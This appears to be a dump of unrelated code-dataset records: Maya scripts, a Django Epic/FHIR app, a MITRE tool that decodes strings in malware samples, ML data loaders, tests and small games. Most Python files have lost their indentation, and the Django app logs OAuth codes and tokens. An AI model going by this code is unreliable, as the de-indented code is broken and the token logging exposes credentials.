arrayToPointColorName=createNode('arrayToPointColor',n=objs[i]+'arrayToPointColor')
connectAttr(attributeTransferName+'.outRgbaPP',arrayDataContainerName+'.inArray')
connectAttr(arrayDataContainerName+'.outArray',arrayToPointColorName+'.inRgbaPP')
connectAttr(attributeTransferName+'.outGeometry',arrayToPointColorName+'.inGeometry')
connectAttr(arrayToPointColorName+'.outGeometry',clusterGeo[0]+'.inMesh',force=1)
else:
connectToMeshNode=listConnections(objShapeNames[0]+'.inMesh',s=1)[0]
attributeTransferName=listConnections(connectToMeshNode,s=1)[2]
            # Check whether the attributeTransfer node's boundingObjects[0] is connected
if not listConnections(attributeTransferName+'.boundingObjects[0]',s=1):
connectAttr(boudingObjName+'.outData',attributeTransferName+'.boundingObjects[0]')
connectAttr(boudingObjName+'.outParentMatrix',attributeTransferName+'.boundingObjects[0].boundParentMatrix')
else:
attributeTransferAttrs=getAttr(attributeTransferName+'.boundingObjects',mi=1)
for i in range(0,len(attributeTransferAttrs)):
                    # Check which boundingObjects attribute of the attributeTransfer node is connected
if not listConnections(attributeTransferName+'.boundingObjects['+str(attributeTransferAttrs[i])+']',s=1):
connectAttr(boudingObjName+'.outData',attributeTransferName+'.boundingObjects['+str(attributeTransferAttrs[i])+']')
connectAttr(boudingObjName+'.outParentMatrix',attributeTransferName+'.boundingObjects['+str(attributeTransferAttrs[i])+'].boundParentMatrix')
elif i>=len(attributeTransferAttrs)-1:
connectAttr(boudingObjName+'.outData',attributeTransferName+'.boundingObjects['+str(attributeTransferAttrs[i]+1)+']')
connectAttr(boudingObjName+'.outParentMatrix',attributeTransferName+'.boundingObjects['+str(attributeTransferAttrs[i]+1)+'].boundParentMatrix')
def createSmoothCmd():
smoothLevelValue=intSliderGrp('smoothLevelTex',q=1,value=1)
objName=ls(sl=1,l=1)[0].split('|')[len(ls(sl=1,l=1)[0].split('|'))-1]
temp_smoothName=polySmooth(c=0,dv=smoothLevelValue)
smoothName=rename(temp_smoothName,objName+'Smooth')
def restoreAllCmd():
grpName=ls('checkNode_grp',tr=1)[0]
if grpName:
delete(grpName)
#boundingObjectNodes=ls('*:*boudingObject',tr=1)
#if boundingObjectNodes:
# delete(boundingObjectNodes)
arrayToPointColorNodes=ls(type='arrayToPointColor')
for arrayToPointColorNode in arrayToPointColorNodes:
connectMesh=listConnections(arrayToPointColorNode,s=0,d=1,p=1)[0]
attributeTransferNode=listConnections(arrayToPointColorNode,s=1,d=0,p=1)[1].split('.')[0]
arrayDataContainerNode=listConnections(arrayToPointColorNode,s=1,d=0,p=1)[0].split('.')[0]
timeToUnitNode=listConnections(arrayDataContainerNode,s=1,d=0,p=1)[0].split('.')[0]
delete(timeToUnitNode)
outGeoNode=listConnections(attributeTransferNode+'.inGeometry',s=1,d=0,p=1)[0]
connectAttr(outGeoNode,connectMesh,force=1)
setAttr(connectMesh.split('.')[0]+'.displayColors',0)
if arrayToPointColorNodes:
delete(arrayToPointColorNodes)
arrayDataContainerNodes=ls(type='arrayDataContainer')
if arrayDataContainerNodes:
delete(arrayDataContainerNodes)
attributeTransferNodes=ls(type='attributeTransfer')
if attributeTransferNodes:
delete(attributeTransferNodes)
smoothNames=ls('*:*Smooth*',typ='polySmoothFace')
if len(smoothNames)>0:
for smoothName in smoothNames:
setAttr(smoothName+'.divisions',0)
#delete(smoothNames)
def restoreSelectedCmd():
#boundingObjectNodes=ls('*:*boudingObject',tr=1)
#if boundingObjectNodes:
# delete(boundingObjectNodes)
selObjNames=ls(sl=1)
okAttrs=[]
boundingObjNodes=[]
for selObj in selObjNames:
arrayToPointColorNode=ls(selObj+'arrayToPointColor',type='arrayToPointColor')[0]
connectMesh=listConnections(arrayToPointColorNode,s=0,d=1,p=1)[0]
attributeTransferNode=listConnections(arrayToPointColorNode,s=1,d=0,p=1)[1].split('.')[0]
attributeTransferInMeshSource=listConnections(attributeTransferNode,s=1,d=0,p=0)[2]
arrayDataContainerNode=listConnections(arrayToPointColorNode,s=1,d=0,p=1)[0].split('.')[0]
timeToUnitNode=listConnections(arrayDataContainerNode,s=1,d=0,p=1)[0].split('.')[0]
delete(timeToUnitNode)
outGeoNode=listConnections(attributeTransferNode+'.inGeometry',s=1,d=0,p=1)[0]
connectAttr(outGeoNode,connectMesh,force=1)
tmpBoundingObjNodes=listConnections(attributeTransferNode,s=1,d=0)
for i in range(0,len(tmpBoundingObjNodes)):
if i%2==0:
if tmpBoundingObjNodes[i].find('boudingObject')>0:
boundingObjNodes.append(tmpBoundingObjNodes[i])
delete(arrayToPointColorNode)
#if nodeType(attributeTransferInMeshSource)=='cluster':
# delete(clusterOutMesh+'Orig')
#delete(arrayDataContainerNode)
#delete(attributeTransferNode)
smoothNames=ls(selObj+'Smooth*',typ='polySmoothFace')
smoothInMeshNodes=''
if len(smoothNames)>0:
for smoothName in smoothNames:
setAttr(smoothName+'.divisions',0)
#smoothInMeshNode=listConnections(smoothNames[0],s=1,d=0,p=1)[0].split('.')[0]
#delete(smoothNames)
#delete(smoothInMeshNode)
setAttr(connectMesh.split('.')[0]+'.displayColors',0)
    # Remove duplicate elements from the list
for i in range(len(boundingObjNodes)-1,-1,-1):
if boundingObjNodes.count(boundingObjNodes[i])>1:
boundingObjNodes.pop(i)
if len(boundingObjNodes)>0:
for boundingObjNode in boundingObjNodes:
boundingObjShape=listRelatives(boundingObjNode,c=1)[0]
if not listConnections(boundingObjShape,s=0,d=1):
delete(boundingObjNode)
checkNodeGrp='checkNode_grp'
if objExists(checkNodeGrp):
if listRelatives(checkNodeGrp,c=1)==None:
delete(checkNodeGrp)
def removeSmooth_ClusterCmd():
selObjs=ls(sl=1,l=1)
for selObj in selObjs:
selObjName=selObj.split('|')[len(selObj.split('|'))-1]
smoothNames=ls(selObjName+'Smooth*',typ='polySmoothFace')
clusterNames=ls(selObjName+'cluster*',typ='cluster')
if len(smoothNames)>0:
smoothInMeshNode=listConnections(smoothNames[0],s=1,d=0,p=1)[0].split('.')[0]
delete(smoothNames)
if nodeType(smoothInMeshNode)=='mesh':
delete(smoothInMeshNode)
if len(clusterNames)>0:
for clusterName in clusterNames:
clusterOutMesh=listConnections(clusterName+'.outputGeometry[0]',s=1,p=1)[0].split('.')[0]
delete(clusterOutMesh+'Orig')
delete(clusterNames)
def setBoundingObjRadiusCmd():
selBoundingObjs=ls(sl=1)
radiusVal=floatSliderGrp('boundingObjectRadiusTex',q=1,v=1)
for boundingObjNode in selBoundingObjs:
boundingObjShape=listRelatives(boundingObjNode,c=1)[0]
setAttr(boundingObjShape+'.pointRadius',radiusVal)
|
999,348 | 60e79cc9c8ae7d2d320e0372de31e3a1a683bd08 | import json
import os
import traceback
import requests
import re
import ast
import logging
from lxml import etree
from django.conf import settings
from django.shortcuts import render, redirect
from django.http import HttpResponse, HttpResponseRedirect, HttpResponseBadRequest
from django.utils import timezone
from rhythm.private import EPIC_TEST_ID, EPIC_CLIENT_ID, EPIC_REDIRECT_URL
from Pisces.decorators import authentication_required
from Pisces import endpoints, observations
logger = logging.getLogger(__name__)
def exchange_token(provider, authorization_code, redirect_url):
token_endpoint = endpoints.get_endpoint(provider, "token")
client_id = EPIC_CLIENT_ID if provider != "Demo" else EPIC_TEST_ID
data = {
"grant_type": "authorization_code",
"code": authorization_code,
"redirect_uri": redirect_url,
"client_id": client_id
}
response = requests.post(token_endpoint, data, headers=dict(Accept="application/json"))
logger.debug(response.content)
token_json = response.json()
return token_json
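# Per the OAuth2 authorization-code flow used here, token_json is expected to
# carry at least "access_token" and the launch "patient" id (see index()
# below); the exact shape varies by provider, so treat this as an assumption
# rather than a guarantee.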
def get_patient_info(request):
if not request.session.get("patient"):
patient_id = request.session.get("patient_id")
api = endpoints.initialize_api(request)
try:
response = api.get("Patient/%s" % patient_id)
except Exception as ex:
request.session["errors"] = "%s: %s" % (type(ex), str(ex))
return None
if response.status_code != 200:
msg = "Failed to get patient data.\n Response Code: %s.\n %s" % (
response.status_code,
response.content
)
logger.debug(msg)
request.session["errors"] = msg
return None
request.session["patient"] = response.json()
return request.session.get("patient")
def logout(request):
request.session.flush()
return redirect("pisces:home")
def index(request):
authorization_code = request.GET.get("code")
provider = request.session.get("provider")
if "localhost" in request.get_host():
redirect_uri = "http://" + request.get_host() + "/pisces"
else:
redirect_uri = EPIC_REDIRECT_URL
if authorization_code and provider:
logger.debug("Provider: %s, Authorization Code: %s" % (provider, authorization_code))
token_json = exchange_token(provider, authorization_code, redirect_uri)
logger.debug(token_json)
return initialize_session(request, token_json.get("access_token"), token_json.get("patient"))
access_token = request.GET.get("access_token")
patient_id = request.GET.get("patient_id")
if access_token and patient_id and provider:
logger.debug("Access code and patient ID found in GET request.")
return initialize_session(request, access_token, patient_id)
providers = endpoints.load_providers()
    # The index page displays and clears any stored errors.
errors = request.session.pop("errors", None)
return render(request, "index.html", {
"title": "Pisces",
"providers": providers,
"top_providers": ["Demo"],
"errors": errors,
})
def initialize_session(request, access_token, patient_id):
request.session["access_token"] = access_token
request.session["patient_id"] = patient_id
request.session["patient"] = get_patient_info(request)
request.session["expiration"] = timezone.now() + timezone.timedelta(seconds=3500)
if request.session["access_token"] and request.session["patient_id"]:
return redirect("pisces:home")
return HttpResponse("Authentication Failed.")
def authenticate(request):
provider = request.GET.get("provider")
request.session["provider"] = provider
client_id = EPIC_CLIENT_ID if provider != "Demo" else EPIC_TEST_ID
if provider == "Demo":
logger.debug("Connecting to sandbox...")
request.session["access_token"] = "X"
request.session["patient_id"] = "Tbt3KuCY0B5PSrJvCu2j-PlK.aiHsu2xUjUM8bWpetXoB"
request.session["patient"] = get_patient_info(request)
request.session["expiration"] = timezone.now() + timezone.timedelta(seconds=3500)
return redirect("pisces:home")
if "localhost" in request.get_host():
redirect_uri = "http://" + request.get_host() + "/pisces"
else:
redirect_uri = EPIC_REDIRECT_URL
try:
authenticate_url = endpoints.get_authentication_url(
client_id=client_id,
provider=provider,
redirect_uri=redirect_uri
)
except NotImplementedError as ex:
return HttpResponse(ex.args)
logger.debug("Redirect URL: %s" % authenticate_url)
return HttpResponseRedirect(authenticate_url)
@authentication_required
def home(request):
patient = get_patient_info(request)
resources = [
{
"name": "Laboratory Results",
"link": "observations/Laboratory"
}
]
return render(request, "home.html", {
"title": "Your Data",
"patient": patient,
"resources": resources,
})
@authentication_required
def view_observations(request, category):
observation_class = getattr(observations, category)
if not observation_class:
return HttpResponseBadRequest("%s is not supported." % category)
patient_id = request.session.get("patient_id")
api = endpoints.initialize_api(request)
response = api.get("Observation", patient=patient_id, category=category)
entries = None
try:
data = response.json()
entries = data.get("entry")
except:
traceback.print_exc()
if not entries:
return HttpResponse("Failed to obtain %s data." % category)
groups = observation_class(entries).group_by_code()
return render(request, "observations.html", {
"title": "Observations",
"data": data,
"groups": groups,
"total": len(groups.keys())
})
@authentication_required
def view_laboratory(request, code):
patient_id = request.session.get("patient_id")
api = endpoints.initialize_api(request)
response = api.get("Observation", patient=patient_id, category="Laboratory")
entries = None
try:
data = response.json()
entries = data.get("entry")
except:
pass
if not entries:
return HttpResponse("Failed to obtain Laboratory data.")
groups = observations.Laboratory(entries).group_by_code()
resources = groups.get(code)
if resources:
title = resources[0].get("code", dict()).get("text")
else:
title = "N/A"
return render(request, "results.html", {
"title": title,
"data": data,
"resources": resources,
})
|
999,349 | b260d6cf43cecb4eedbba5068d2d6e42c46825f3 | import os
from src.constants import INPUT_DIR_PATH
def split_file(input_file_path, result_dir_path, n):
file_name = os.path.splitext(input_file_path)[0]
new_files = [
os.path.join(result_dir_path, '{}_{}.txt'.format(file_name, i))
for i in range(1, n+1)
]
chunk_size = os.path.getsize(input_file_path) // n
    with open(input_file_path, 'r') as f:
        for i, _file in enumerate(new_files):
            # Let the last chunk absorb the remainder so no trailing bytes are lost.
            data = f.read() if i == len(new_files) - 1 else f.read(chunk_size)
            with open(_file, 'w') as nf:
                nf.write(data)
def get_split_file_path_by_name(name):
return os.path.join(INPUT_DIR_PATH, name)
# split_file(
# '/Users/rickskyy/projects/distributed_systems_course/resources/bible.txt',
# '/Users/rickskyy/projects/distributed_systems_course/resources',
# 15
# )
|
999,350 | a15e3c6fb19f5fa92439a829a824c9f55e4937c3 | n = 4
k = 3
visited = [False]*n
a = []
b = [0]*n
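# chinhhop ("chỉnh hợp", Vietnamese for arrangement/permutation) enumerates
# every k-permutation of {1..n}: b holds the current partial arrangement and
# a collects the distinct results.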
def chinhhop(i):
global a, c
if k <= n:
for v in range(0,n):
# a.append(v)
if (visited[v] == False):
b[i] = v + 1
visited[v] = True
if i == k:
c = []
for j in range(0, k):
c += [b[j]]
if(c not in a):
a += [c]
else:
chinhhop(i+1)
visited[v] = False
else:
return False
chinhhop(0)
print(*a)
|
999,351 | c46e486e0ca8fa0db3a8827d2db1e91b6776986a | """Author: Manuel Reinbold, Maximilian Renk
Date: 21/11/17
Version: 1.0
"""
import glob
from xml.dom import minidom
# Delivers the unpreprocessed raw data for all movie reviews.
def get_raw_data():
    data_path_positive = '../data/movieReviews/positiveFiles.txt'
    data_path_negative = '../data/movieReviews/negativeFiles.txt'
positive_texts = get_data_from_txt(data_path_positive)
negative_texts = get_data_from_txt(data_path_negative)
sorted_texts = positive_texts + negative_texts
return sorted_texts, positive_texts, negative_texts
# Reads review texts line by line from a txt file.
def get_data_from_txt(filepath):
texts = []
with open(filepath, 'r', encoding='UTF-8') as file:
for line in file:
texts.append(line.strip('\n'))
return texts
def convert_to_one_file():
pos_path = '../data/movieReviews/positiveReviews/*.txt'
neg_path = '../data/movieReviews/negativeReviews/*.txt'
pos_files = glob.glob(pos_path)
neg_files = glob.glob(neg_path)
for name in pos_files:
with open('../data/movieReviews/positiveFiles.txt', 'a', encoding='utf-8') as writer:
with open(name, 'r', encoding='utf-8') as reader:
writer.write(reader.readline()+'\n')
for name in neg_files:
with open('../data/movieReviews/negativeFiles.txt', 'a', encoding='utf-8') as writer:
with open(name, 'r', encoding='utf-8') as reader:
writer.write(reader.readline()+'\n')
def main():
print("Please execute some code")
if __name__ == "__main__":
main() |
999,352 | 198bd2a9f460389f136602798a7674730e69759c | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright(c) 2021 The MITRE Corporation. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
#
# You may obtain a copy of the License at:
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import pefile
import logging
import re
import base64
import zlib
__version__ = "1.0.0"
__author__ = "Jason Batchelor"
log = logging.getLogger(__name__)
class GetConfig:
def __init__(self, buff):
"""
Initialize decoder instance.
:param bytes buff: The stream of bytes to be processed.
"""
self.buff = buff
self.elements = []
try:
pe = pefile.PE(data=self.buff)
self.decode_config(pe)
except pefile.PEFormatError:
log.debug('Supplied file must be a valid PE!')
def decode_config(self, pe):
unicode_candidates = self.find_unicode()
elements = self.find_decode_suspect_data(unicode_candidates)
self.elements = elements
def find_unicode(self, modifier=4):
"""
        Find printable UTF-16LE (wide-character) strings of at least `modifier` characters within the supplied data.
"""
wide = []
matches = re.finditer(b'([\x20-\x7e]\x00){' +
str(modifier).encode('ascii') + b',}', self.buff)
if matches:
for m in matches:
wide.append(m.group(0).decode('utf-16'))
return wide
def find_decode_suspect_data(self, candidates):
"""
From a list of candidate strings, try to decode using b64 + DEFLATE.
"""
elements = []
# Reference: Seems to reliably detect with minimal FPs
# https://github.com/ctxis/CAPE/blob/master/lib/cuckoo/common/office/olevba.py#L444
b64_rex = re.compile(
r'(?:[A-Za-z0-9+/]{4}){1,}(?:[A-Za-z0-9+/]{2}'
r'[AEIMQUYcgkosw048]=|[A-Za-z0-9+/][AQgw]==)?'
)
for c in candidates:
if b64_rex.match(c):
try:
b64 = base64.b64decode(c, validate=True)
deflate = zlib.decompress(b64, -15)
e = deflate.decode('ascii')
log.info('Candidate found! %s' % c)
elements.append(e)
except Exception:
pass
return sorted(set(elements))
def initialize_parser():
parser = argparse.ArgumentParser(
description='Process candidate. Prints results in JSON format.')
parser.add_argument('candidates', metavar='FILE',
nargs='*', help='candidate file(s).')
parser.add_argument('-v', '--verbose', action='store_true',
default=False,
help='Output additional information when processing '
'(mostly for debugging purposes).')
return parser
def main():
import os
import json
import datetime
import hashlib
p = initialize_parser()
args = p.parse_args()
root = logging.getLogger()
logging.basicConfig()
if args.verbose:
root.setLevel(logging.DEBUG)
else:
root.setLevel(logging.WARNING)
# Iterate through list of files in bulk.
for filename in args.candidates:
log.info('Processing file %s...' % filename)
if not os.path.isfile(filename):
log.warning('Failed to find file %s' % filename)
continue
f = open(filename, 'rb')
stream = f.read()
try:
pe = pefile.PE(data=stream)
timestamp = datetime.datetime.utcfromtimestamp(
pe.FILE_HEADER.TimeDateStamp)
except pefile.PEFormatError:
log.warning('%s not a pe, skipping...' % f.name)
continue
d = GetConfig(stream)
config_dict = {
'Compile Time': '%s UTC' % timestamp,
'MD5': hashlib.md5(stream).hexdigest(),
'Decoded Elements': d.elements,
}
try:
print(json.dumps(config_dict, indent=4, sort_keys=False))
except UnicodeDecodeError:
log.warning('There was a Unicode decoding error when '
'processing %s' % os.path.basename(filename))
continue
if __name__ == '__main__':
main()
|
999,353 | bf5f7f7dcf913e643f493ff10f3ecf4ab66417b1 | # coding: utf-8
from celery import Celery
app = Celery("ihome")
app.config_from_object("ihome.tasks.config")
# Let celery discover tasks on its own
app.autodiscover_tasks(["ihome.tasks.sms"]) |
999,354 | 017073eed14cb7eb8f6f07ca3d3624d5b4387a0c | __author__ = 'octowl'
from collections import Counter
def word_count(phrase):
return Counter(phrase.split())
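# Example: word_count("olly olly in come free")
# == Counter({'olly': 2, 'in': 1, 'come': 1, 'free': 1})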
|
999,355 | ff1aa112ea3cbebb68296c75e2e02abbe421e909 | # Copyright (c) MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import annotations
import unittest
import torch
from parameterized import parameterized
from monai.transforms import GridSplit
from tests.utils import TEST_NDARRAYS, assert_allclose
A11 = torch.randn(3, 2, 2)
A12 = torch.randn(3, 2, 2)
A21 = torch.randn(3, 2, 2)
A22 = torch.randn(3, 2, 2)
A1 = torch.cat([A11, A12], 2)
A2 = torch.cat([A21, A22], 2)
A = torch.cat([A1, A2], 1)
TEST_CASE_0 = [{"grid": (2, 2)}, A, [A11, A12, A21, A22]]
TEST_CASE_1 = [{"grid": (2, 1)}, A, [A1, A2]]
TEST_CASE_2 = [{"grid": (1, 2)}, A1, [A11, A12]]
TEST_CASE_3 = [{"grid": (1, 2)}, A2, [A21, A22]]
TEST_CASE_4 = [{"grid": (1, 1), "size": (2, 2)}, A, [A11]]
TEST_CASE_5 = [{"grid": (1, 1), "size": 4}, A, [A]]
TEST_CASE_6 = [{"grid": (2, 2), "size": 2}, A, [A11, A12, A21, A22]]
TEST_CASE_7 = [{"grid": (1, 1)}, A, [A]]
TEST_CASE_8 = [
{"grid": (2, 2), "size": 2},
torch.arange(12).reshape(1, 3, 4).to(torch.float32),
torch.Tensor([[[[0, 1], [4, 5]]], [[[2, 3], [6, 7]]], [[[4, 5], [8, 9]]], [[[6, 7], [10, 11]]]]).to(torch.float32),
]
TEST_SINGLE = []
for p in TEST_NDARRAYS:
TEST_SINGLE.append([p, *TEST_CASE_0])
TEST_SINGLE.append([p, *TEST_CASE_1])
TEST_SINGLE.append([p, *TEST_CASE_2])
TEST_SINGLE.append([p, *TEST_CASE_3])
TEST_SINGLE.append([p, *TEST_CASE_4])
TEST_SINGLE.append([p, *TEST_CASE_5])
TEST_SINGLE.append([p, *TEST_CASE_6])
TEST_SINGLE.append([p, *TEST_CASE_7])
TEST_SINGLE.append([p, *TEST_CASE_8])
TEST_CASE_MC_0 = [{"grid": (2, 2)}, [A, A], [[A11, A12, A21, A22], [A11, A12, A21, A22]]]
TEST_CASE_MC_1 = [{"grid": (2, 1)}, [A] * 5, [[A1, A2]] * 5]
TEST_CASE_MC_2 = [{"grid": (1, 2)}, [A1, A2], [[A11, A12], [A21, A22]]]
TEST_MULTIPLE = []
for p in TEST_NDARRAYS:
TEST_MULTIPLE.append([p, *TEST_CASE_MC_0])
TEST_MULTIPLE.append([p, *TEST_CASE_MC_1])
TEST_MULTIPLE.append([p, *TEST_CASE_MC_2])
class TestGridSplit(unittest.TestCase):
@parameterized.expand(TEST_SINGLE)
def test_split_patch_single_call(self, in_type, input_parameters, image, expected):
input_image = in_type(image)
splitter = GridSplit(**input_parameters)
output = splitter(input_image)
for output_patch, expected_patch in zip(output, expected):
assert_allclose(output_patch, expected_patch, type_test=False)
@parameterized.expand(TEST_MULTIPLE)
def test_split_patch_multiple_call(self, in_type, input_parameters, img_list, expected_list):
splitter = GridSplit(**input_parameters)
for image, expected in zip(img_list, expected_list):
input_image = in_type(image)
output = splitter(input_image)
for output_patch, expected_patch in zip(output, expected):
assert_allclose(output_patch, expected_patch, type_test=False)
if __name__ == "__main__":
unittest.main()
|
999,356 | 49f50760114dfb0ee12de7893f5952ef4a8d8736 | """Test HomematicIP Cloud helper functions."""
import json
from homeassistant.components.homematicip_cloud.helpers import is_error_response
async def test_is_error_response() -> None:
"""Test, if an response is a normal result or an error."""
assert not is_error_response("True")
assert not is_error_response(True)
assert not is_error_response("")
assert is_error_response(
json.loads(
'{"errorCode": "INVALID_NUMBER_PARAMETER_VALUE", "minValue": 0.0, "maxValue": 1.01}'
)
)
assert not is_error_response(json.loads('{"errorCode": ""}'))
|
999,357 | 3c0d82837c75a434ecf0cb98fa8539b282a8fcd8 | import socket
# commented-out lines were for the UDP version
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
port = 8888
#ip = "192.168.56.101"
s.connect(('192.168.56.101',port))
#s.bind(('',port))
#while True:
data = s.recvfrom(1024)
s.send(b'Hi, I am the client. ty.')
print(data)
s.close()
|
999,358 | a51574e4f33bd80704006175214d18ae1a4568bb | from .template import Template
class Comic(Template):
def __init__(self, dedup_headings=False, la_overrides=None):
super(Comic, self).__init__(
dedup_headings=dedup_headings,
la_overrides=la_overrides
)
self.footer_break = 50.0
def cleanup(self, content):
return content.strip().replace('(cid:1)', '-')
def handle_heading(self, text):
if 15.0 < text.height < 16.0:
return 1
if 11.03 < text.height < 11.04:
return 2
return 0
def handle_indent(self, text, content):
if 113.0 < text.x0:
return (1, content[0].isupper())
return (0, False)
def handle_ignored(self, content, in_table):
if not in_table:
return content.strip() in [
u'(suite)',
u'-'
]
return False
def handle_newline(self, content, in_table):
if in_table:
return content.startswith(u'- ') \
or content.endswith(u'.') \
or content.endswith(u':')
return False
def handle_linebreaks(self, content, in_table):
return not in_table and len(content)
|
999,359 | 9e85bfd855ea6f829367711b20c2e4d2c5a94441 | def hamming_distance(a, b):
    if len(a) != len(b):
        raise ValueError("strand lengths not equal")
    # Count the positions at which the two strands differ
    # (the original built a pair list and used filter(), which
    # returns a lazy iterator without len() in Python 3).
    return sum(1 for x, y in zip(a, b) if x != y)
if __name__ == "__main__":
print(hamming_distance("aabbccdd", "aabbccdd"))
|
999,360 | c571a3371f2ffd8dee3cab19ce259c8b7ea6b118 | import tensorflow as tf
import pandas as pd
from sklearn.preprocessing import LabelEncoder
AUTOTUNE = tf.data.experimental.AUTOTUNE
class Data:
def __init__(self, filepath='./', batch_size=512, only_rating=False, buffer_size=1024):
self.batch_size = batch_size
self.buffer_size = buffer_size
self.train = pd.read_csv(filepath+'train.csv')
self.test = pd.read_csv(filepath+'test.csv')
self.only_rating = only_rating
self.feature_list = []
        all_data = pd.concat([self.train, self.test])
        for column in all_data.columns[:-1]:
            encoder = LabelEncoder()
            encoder.fit(all_data[column])
            self.feature_list.append(len(encoder.classes_))
            self.train[column] = encoder.transform(self.train[column])
            self.test[column] = encoder.transform(self.test[column])
self.user_size = self.feature_list[0]
self.movie_size = self.feature_list[1]
def get_train(self):
target = self.train.pop("rating")
if self.only_rating:
return tf.data.Dataset.from_tensor_slices((self.train[["user_id", "movie_id"]].values, target.values)).batch(self.batch_size).prefetch(self.buffer_size)
else:
return tf.data.Dataset.from_tensor_slices((self.train.values, target.values)).batch(self.batch_size).prefetch(self.buffer_size)
def get_test(self):
target = self.test.pop("rating")
if self.only_rating:
return tf.data.Dataset.from_tensor_slices(
(self.test[["user_id", "movie_id"]].values, target.values)).batch(self.batch_size).prefetch(
self.buffer_size)
else:
return tf.data.Dataset.from_tensor_slices((self.test.values, target.values)).batch(
self.batch_size).prefetch(self.buffer_size)
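# Usage sketch (assumes train.csv/test.csv whose last column is "rating" and
# whose first two columns are user_id and movie_id, per the defaults above):
#   data = Data(filepath='./', batch_size=512)
#   train_ds, test_ds = data.get_train(), data.get_test()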
|
999,361 | 59a90a2e7c9ab99293aef895377682dab3c18044 | import random
money = 100
#CoinFlip Game
def coin_flip(call, bet):
coin = random.randint(1, 2)
#RULES
    if bet > money:
        print("You don't have enough money to make that bet!")
        return
    elif bet <= 0:
        print("Bet must be positive!")
        return
#Coin lands on Heads!
elif coin == 1 and call == "Heads!":
print ("Heads! $" + str(bet))
return bet
elif coin == 1 and call == "Tails!":
print ("Heads! $" + str(bet-(bet*2)))
return -bet
#Coin lands on Tails!
elif coin == 2 and call == "Tails!":
print ("Tails! $" + str(bet))
return bet
elif coin == 2 and call == "Heads!":
print ("Tails! $" + str(bet-(bet*2)))
return -bet
#Cho_han Game
def cho_han(call, bet):
dice1 = random.randint(1, 6)
dice2 = random.randint(1, 6)
dice_roll=dice1+dice2
#RULES
    if bet > money:
        print("You don't have enough money to make that bet!")
        return
    elif bet <= 0:
        print("Bet must be positive!")
        return
#Dice roll
elif dice_roll % 2 == 0 and call == "Even!":
print ("Even! $" + str(bet))
return bet
elif dice_roll % 2 == 0 and call == "Odd!":
print ("Even! $" + str(bet-(bet*2)))
return -bet
elif dice_roll % 2 > 0 and call == "Odd!":
print ("Odd! $" + str(bet))
return bet
elif dice_roll % 2 > 0 and call == "Even!":
print ("Odd! $" + str(bet-(bet*2)))
return -bet
#Card_draw Game
def card_draw(bet):
card_p1 = random.randint(1, 13)
card_p2 = random.randint(1, 13)
#RULES
    if bet > money:
        print("You don't have enough money to make that bet!")
        return
    elif bet <= 0:
        print("Bet must be positive!")
        return
elif card_p1 > card_p2:
print ("Player 1 wins $" + str(bet))
return bet
elif card_p2 > card_p1:
print ("Player 1 lost $" + str(bet-(bet*2)))
return -bet
elif card_p1 == card_p2:
print ("Tie $" + str(0))
return 0
#Roulette Game
# Impair (Odd) and Pair (Even), pays 1:1
# Manque (Low, 1-18) and Passe (High, 19-35), pays 1:1
# Number (a specific number), pays 35:1
def roulette(call, bet):
number = random.randint(0, 36)
#RULES
    if bet > money:
        print("You don't have enough money to make that bet!")
        return
    elif bet <= 0:
        print("Bet must be positive!")
        return
    elif (call == 0 or call == 36):
        print ("Roulette: Specific Number must be between 1 and 35!")
        return 0
#specific number
elif number == call:
print (str(number) + ", Player wins! $" + str(bet*35))
return (bet*35)
#0, 00
elif number == 0:
print ("0, Player lost! $" + str(bet-(bet*2)))
return -bet
elif number == 36:
print ("00, Player lost! $" + str(bet-(bet*2)))
return -bet
#low/high
elif (number >= 1 and number <= 18) and call == "Low!":
print ("Low, Player wins! $" + str(bet))
return bet
elif (number >= 1 and number <= 18) and call == "High!":
print ("Low, Player lost! $" + str(bet-(bet*2)))
return -bet
elif (number >= 19 and number <= 35) and call == "Low!":
print ("High, Player lost! $" + str(bet-(bet*2)))
return -bet
elif (number >= 19 and number <= 35) and call == "High!":
print ("High, Player wins! $" + str(bet))
return bet
#odd/even
elif call == "Even!" and number % 2 == 0:
print ("Even, Player wins! $" + str(bet))
return bet
elif call == "Even!" and number % 2 != 0:
print ("Odd, Player lost! $" + str(bet-(bet*2)))
return -bet
elif call == "Odd!" and number % 2 == 0:
print ("Even, Player lost! $" + str(bet-(bet*2)))
return -bet
elif call == "Odd!" and number % 2 != 0:
print ("Odd, Player wins! $" + str(bet))
return bet
#not specific number
else:
print ("Player lost! $" + str(bet-(bet*2)))
return -bet
print("GameTestsStart")
#Call CoinFlipGame
print("CoinFlip:")
print(coin_flip("Tails!", 10))
#Call Cho-han Game
print("Cho-han:")
print(cho_han("Odd!", 10))
#Call Card_draw Game
print("Card_draw:")
print(card_draw(10))
#Call Roulette
print("Roulette:")
print(roulette(0,10))
print("GameTestsEnd")
print(" ")
#Play roulette, cho_han, coin_flip or card_draw!
#roulette(call,bet) cho_han(call,bet) coin_flip(call,bet) card_draw(bet)
#CoinFlip call needs to be either "Heads!" or "Tails!"
#Cho-han call needs to be either "Odd!" or "Even!"
#Roulette call needs to be either "Odd!", "Even!", "High!", "Low!" or a specific Number between 1 and 35!
try:
money += roulette("High!",10)
money += cho_han("Even!",10)
money += coin_flip("Heads!",10)
money += card_draw(10)
except:
    # An invalid bet returns None, so the additions above raise TypeError.
    print("Follow the Rules!")
print(str(money) + "$ left!")
|
999,362 | 9ee887af99bc2df5c3a372564cba546818f567ab | import re
def swap(lst, a, b):
lst[a], lst[b] = lst[b], lst[a]
def push_bit(s):
"""Given a string like '0110100', push bits towards the right.
Returns 'END' if nothing can be pushed
"""
end_pattern = re.compile(r'^0*1+$')
if end_pattern.match(s):
return "END"
else:
bit_lst = list(s)
first_one = bit_lst.index('1')
# print("first_one", first_one)
